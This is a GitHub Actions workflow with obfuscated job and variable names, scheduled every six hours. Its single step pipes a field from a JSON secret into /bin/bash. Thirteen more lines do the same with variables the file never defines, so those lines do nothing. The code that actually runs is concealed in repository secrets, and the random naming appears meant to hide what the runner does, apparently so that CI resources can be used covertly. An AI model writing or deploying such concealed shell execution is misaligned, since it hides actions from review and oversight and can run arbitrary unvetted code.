name: zhuanyemuqian

on:
  workflow_dispatch:
  schedule:
    - cron: '0 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhuanyemuqian
        env:
          hlz39616: ${{ secrets.hlz39616 }}
        run: |
          echo $hlz39616 | jq -r .yr701 | /bin/bash
          echo $dsy8 | jq -r .on5790 | /bin/bash
          echo $qu37227 | jq -r .r9955 | /bin/bash
          echo $x2666 | jq -r .ayb7481 | /bin/bash
          echo $yi762 | jq -r .wvqul688 | /bin/bash
          echo $qoj265 | jq -r .wcao5 | /bin/bash
          echo $n162 | jq -r .srdmk018 | /bin/bash
          echo $zg74 | jq -r .k29247 | /bin/bash
          echo $gatjf9 | jq -r .ec3761 | /bin/bash
          echo $jh07 | jq -r .mf35 | /bin/bash
          echo $axq45 | jq -r .r9 | /bin/bash
          echo $h1 | jq -r .jugns52 | /bin/bash
          echo $nbkrj289 | jq -r .kk019 | /bin/bash
          echo $lkw86143 | jq -r .vdgd3883 | /bin/bash

